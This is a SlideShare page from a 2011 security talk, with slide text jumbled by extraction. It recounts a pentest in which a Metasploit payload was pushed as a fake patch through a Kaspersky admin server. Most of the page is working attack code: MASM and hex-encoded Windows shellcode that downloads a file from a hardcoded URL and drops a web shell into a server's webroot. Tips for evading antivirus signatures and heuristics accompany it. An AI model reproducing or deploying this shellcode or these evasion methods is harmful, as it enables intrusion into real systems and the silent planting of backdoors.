Evolution of Download Deploy Sheelcode


Published on

Evolution of Download Deploy Sheelcode by Rahul Sasi @ null Mumbai Meet in January, 2011

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Evolution of Download Deploy Sheelcode

  1. 1. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Any way we dint give up and started attacking Antivirus/ Firewall the AV Admin server itself, and woot woot we Evasion Techniques: were in. Am not gone mention how I got inEvolution of Download Deploy coz u will laugh Shellcode and that is not the point , the point is I was able [FB1H2S aka Rahul Sasi] to get an RDP to Kaspersky admin server machine. And the fun begins. http://fb1h2s.com http://garage4hackers.com As it was Kasper-sky Admin server, and all the network machines were connected to it, andOverview: Admin server manages everything from updating individual computers with updatesThe effectiveness of an Anti virus/ Firewall is form patching the server.highly valued to it customers and in scenarios ofa PenTest. This post talks about a serious ofobservations and techniques tried in order to Screenshots not live: form Kaspersky website:bypass AV and evaluate AV/Firewallseffectiveness and the development ofDownload Deploy payload.What made me write this?I was assigned with a PT which we were able toachieve 100% percent success. And the successrates were because of an Anti virus Server, okhere is the incident. [Skip this, its boring]After completing VA we moved on to PT, a goodno of un patched windows systems werespotted so we armed msf(Metsploit) andstarted shooting, but exploits failed , and no What quickly strike me was the Push patchesmetpreters or Cmd shells came back. Well all options which were used to update clientbecause of a stupid AV server. A Kasper-sky computer with patches and installers, quickserver was running and that was used to taught!manage the entire network. Well payloadencoding work but, certain vulnerabilities What If I make a Metpreter_reverse_tcp andmultiple exploitation is not possible so if you fail push it as a patch to the client computers will itfirst you will lose the game, so different ideas work??and taught s popped in my head and this paperis an implementation of that. Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
  2. 2. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” [2] I had situation before too, were server was behind a firewall and was not able to get reverse/bind shell because of AV/Firewall I need a way to bypass that. [3] Will the things I did above could be done with a domain controller too? Answer to Q no [3] by Wirless Punter" suggested a better strategy which he tried before. [-] Make a VBS or Bat script which creates a newSteps: user and then enable telnet.[+] Made the metpreter and moved to Admin [-] Push the script as update, simple and veryserver effective "[-] Admin server dint detect the default nonencoded metpreter as a virus , No idea why :O Question No [1] and [2]s answer is what this[+] Shut down the remote AV client form admin paper is all aboutserver[-] Kaspersky Admin kit had a feature to build aninstaller out of an executable[+] Converted the metpreter .exe to .msiinstaller, seems like the AV signs the payloadwhen this is done[+] Pushed it to clientAnd royal woot woot we had a metpreter, sameway we could have shelled the entire network ,took enough POCs and headed home.Thanks to D4rkest for his great support andideas.Well PT was over but few question remainedAnd the best way to hack an application isRTFM[Read the f$$$$$# manual]http://utils.kaspersky.com/docs/engl...admguideen.pdf[1] Why did the AV admin server dint detect theMsf non encoded payload when moved toadmin server, when it was getting detected onclient machines? Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
  3. 3. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” Anti Virus Evading techniques, and ;------------------------------------------ analyzing the quality of an AV - ; Comilied with MASM32 .586 .model flat,stdcall option casemap:noneSignature based detection: Analyzing include C:masm32includewindows.incEfficacy and Bypassing detection include C:masm32includeuser32.inc include C:masm32includekernel32.incWiki: include C:masm32includeshell32.inc include C:masm32includeurlmon.inchttp://en.wikipedia.org/wiki/Antivirus_software includelib masm32libuser32.libCompares the contents of a file to a dictionary includelib masm32libkernel32.libof virus signatures. includelib masm32libshell32.lib includelib masm32liburlmon.libAnalyzing the efficacy of an AV: .data URL db "",0Test 1 EXIT db "ExitProcess" PATH db "c:testsas.exe",0Testing for false positives, I started with asimple test shell code program, a skeleton thats .data res dd ?used to execute test shell codes, added few Nopinstruction to it, "currently the exe is absolutely .codeharmless". #include<stdio.h> ; --------------------http://FB1H2S.com char code[]="/x90/x90"; fb1h2s http://Garage4Hackers.com----------- int main(int argc, char **argv) ------------------------------------------- { - int (*func)(); func = (int (*)()) code; (int)(*func)(); start: } invoke URLDownloadToFile,0,addr URL,addr PATH,0,0 invoke ExitProcess,0Uploaded to Virus total and obtained thefollowing results. end startHere , Here: Ya one False positive by Quick heal.[-] Moved form C to ASM as now we couldstrike a little deeper[-] Build a quick download virus to destinationpayload Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
  4. 4. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” And on compiling and linking the application Without exit function the payload still works itself my AVG scanner popped alerting me the output executable was scanned and and my about the payload. AVG said it was clean. And thats how signature based detection works how dump it is. So function calls Urldownloadtofile + Exit process the combination would be what AVG would have build its signature with. Ok so what if I remove Exitprocess and compile the Heuristics: Considering shell codes it’s program. not affected much;------------------------------------------- Runs the payload on a sandbox and identifies ; Comilied with MASM32 the behavior: AV plants hooks to certain critical.586.model flat,stdcall system calls and monitors those activities , sooption casemap:none Reverse/Bind shell and socket operations are at include C:masm32includewindows.inc times an Issue. include C:masm32includeuser32.inc include C:masm32includekernel32.inc include C:masm32includeshell32.inc include C:masm32includeurlmon.inc So the taught is how to bypass Signature includelib masm32libuser32.lib Detection + above mentioned Heuristics + includelib masm32libkernel32.lib Firewall issues includelib masm32libshell32.lib includelib masm32liburlmon.lib.data DownLoadFile + ExcuteFile + ExitProcessURL db "",0EXIT db "ExitProcess"PATH db "c:testsas.exe",0.data No way this could escape the heuristic behavior res dd ? , well downloading a program wont create.code much panic but trying to execute it would cause suspicion .Well obviously it would not be of any; --------------------http://FB1H2S.com fb1h2s use if the payload just downloads the file andhttp://Garage4Hackers.com------------------------------------------------------- dsnt trigger it, and triggering it is where the problem occurs.start: invoke URLDownloadToFile,0,addr URL,addr So what is the alternative?PATH,0,0 ;invoke ExitProcess,0 Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcodeend start
  5. 5. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals” ;#File: Download_deploy.asm[+] Download Execute will cause troubles to our ; [BITS 32]payload. global _start[-] If we just download the executable thatwon’t be of any use _start:[+] And AV/Firewall could make situations tough jmp short entry ;by not letting us give reverse shell %include "kernal32.asm"[+] And if the application we are begin:targeting[Apache old version] is behind a call find_kernel32 mov ebx, eaxfirewall and even if we were able to execute jmp short u ; Skipcode we can’t get a shell back because of the entry:firewall. call begin[-] So why not use a web shell , some Php or u: push 0xec0e4e8e ; LoadLibraryA hashasp shell if target has got a web server. push ebx ; kernel32 base address call find_function ; find address[+] A payload that would download a web shelland place it on the servers WebRoot directory. ; LoadLibraryA PUSH 0x00206e6fOr simply writes a new web shell . PUSH 0x6d6c7275 xor ecx, ecx mov [esp + 9],cl mov ecx , espAll firewall lets web servers traffic and push ecxWebShells "Hardly I have seen any getting call eax ; eax holds our function addressdetected by AV" . So that budded the idea of a download:Download + Deploy payload. push 0x702f1a36 ; URLDownloadToFileAhash push eax ; u-lmon.dll base address call find_function ; find address Download + Executes triggers AV alert pop edi xor ebp, ebp So just Download a WebShell and PUSH 0x58202020 ; path to deploy PUSH 0x7073612e drops it in WebRoot PUSH 0x735c746f PUSH 0x6f727777 PUSH 0x775c6275 PUSH 0x7074656e PUSH 0x495c3a43 mov ebp , espYou could get a semi interactive shell and will xor ecx, ecx ; ecx = 0 we need itwork fine even in case of AV and firewall. mov [ebp + 24], cl ;ebp no null PUSH 0x58202065 ; url to file##################################### PUSH 0x78652e61 PUSH 0x2f34383a# Title ownload Deploy Shell code by FB1H2S PUSH 0x312e302e PUSH 0x302e3732# Date: [18/1/2011] PUSH 0x312f2f3a# Author: FB1H2S PUSH 0x70747468 mov edi, esp# Tested on: [Works form win xp to Win 7 all mov [edi + 25], cl ; edi no null push ecx ; lpfnCBversions] push ecx ; dwReserved push ebp ; szFileName# Paths hardcoded, could port to msf push edi ;url#Place the webshell to be uploaded on ur local push ecx ; pCaller call eax ; eax holds our function aserver webroot exit: push 0x73e2d87e ; ExitProcess hash push ebx ; kernel32 base address call find_function ; find address ; ExitProcess call eax ; holds our function address Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode
  6. 6. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”;# Test the Shell Code:;#;#Code file: kernal.asm;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Code:;;;;;;;;;;;;;; // Download file form locationfind_kernel32: //Url hardcoded so not Use full for all xor eax, eax ; clear eax yet mov eax, [fs:0x30 ] ; pointer to the PEB #include<stdio.h> mov eax, [ eax + 0x0C ] ; get PEB->Ldr mov eax, [ eax + 0x14 ] ; get PEB- char code[] =>Ldr.InMemoryOrderModuleList.Flink "xebx70x31xc0x64xa1x30x00" ; (1st entry) "x00x00x8bx40x0cx8bx40x14" mov eax, [ eax ] ; (2nd entry) "x8bx00x8bx00x8bx40x10xc3" mov eax, [ eax ] ; (3rd entry) mov eax, [ eax + 0x10 ] ;3rd entries base "x60x8bx6cx24x24x8bx45x3c"address "x8bx54x05x78x01xeax8bx4a" ; eax = kernel32.dll works on all windows "x18x8bx5ax20x01xebxe3x37"versions xp to win 7 "x49x8bx34x8bx01xeex31xff" ret "x31xc0xfcxacx84xc0x74x0a" "xc1xcfx0dx01xc7xe9xf1xff"find_function: "xffxffx3bx7cx24x28x75xde" pushad ; Save all "x8bx5ax24x01xebx66x8bx0c"registers mov ebp, [esp + 0x24] "x4bx8bx5ax1cx01xebx8bx04" mov eax, [ebp + 0x3c] "x8bx01xe8x89x44x24x1cx61" mov edx, [ebp + eax + 0x78] "xc3xe8x94xffxffxffx89xc3" add edx, ebp "xebx05xe8xf2xffxffxffx68" mov ecx, [edx + 0x18] mov ebx, [edx + 0x20] "x8ex4ex0execx53xe8x96xff" add ebx, ebp "xffxffx68x6fx6ex20x00x68"find_function_loop: "x75x72x6cx6dx31xc9x88x4c" jecxz find_function_finished "x24x09x89xe1x51xffxd0x68" dec ecx mov esi, [ebx + ecx * 4] "x36x1ax2fx70x50xe8x76xff" add esi, ebp "xffxffx5fx31xedx68x20x20" "x20x00x68x2ex61x73x70x68"compute_hash: "x6fx74x5cx73x68x77x77x72" xor edi, edi ; Zero edi xor eax, eax ; Zero eax "x6fx68x75x62x5cx77x68x6e" cld ; Clear "x65x74x70x68x43x3ax5cx49"direction "x89xe5x31xc9x88x4dx18x68" "x65x20x20x00x68x61x2ex65"compute_hash_again: lodsb ; Load the "x78x68x3ax38x34x2fx68x2e"next byte from esi into al "x30x2ex31x68x32x37x2ex30" test al, al ; Test "x68x3ax2fx2fx31x68x68x74"ourselves. "x74x70x89xe7x88x4fx1ax51" jz compute_hash_finished ; If the ZFis set, weve hit the null term. "x51x55x57x51xffxd0x68x7e" ror edi, 0xd ; Rotate "xd8xe2x73x53xe8x0fxffxff"edi 13 bits to the right "xffxffxd0"; add edi, eax ; Add the int main(int argc, char **argv)new byte to the accumulator jmp compute_hash_again ; Next {iteration int (*func)(); func = (int (*)()) code;compute_hash_finished: (int)(*func)();find_function_compare: cmp edi, [esp + 0x28] } jnz find_function_loop mov ebx, [edx + 0x24] add ebx, ebp mov cx, [ebx + 2 * ecx] mov ebx, [edx + 0x1c] add ebx, ebp mov eax, [ebx + 4 * ecx] add eax, ebpOriginal Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- mov [esp + 0x1c], eax Evolution-of-Download-Deploy-Shellcodefind_function_finished: popad ; Restoreall registers ret
  7. 7. http://www.Garage4Hackers.com A Garage for “Hackers and Security Professionals”[+] Issues: Url and path are Hard Coded so itsUse less I published the code to get suggestionsso that I could make an Improved version ofcode and make a Metsploit module[-] Currently Web Root path is Hard coded and Ican’t think about a way if web root is changed[-] Need a solution to dynamically finds the webroots IIS and Apache to make the Shell codebetter.[-] Codes and betters images form:http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques-Evolution-of-Download-Deploy-Shellcode#And all greets to Garage Hackers and NullMembers.#http://www.garage4hackers.com/forum.phpB0Nd,Eberly,Wipu,Vinnu,w4ri0r,empty,neo,Rohith,Sids786,SmartKD,Tia,d4rkest,Atul,beenu,Nishant,prashant Original Thread: http://www.garage4hackers.com/showthread.php?708-Antivirus-Firewall-Evasion-Techniques- Evolution-of-Download-Deploy-Shellcode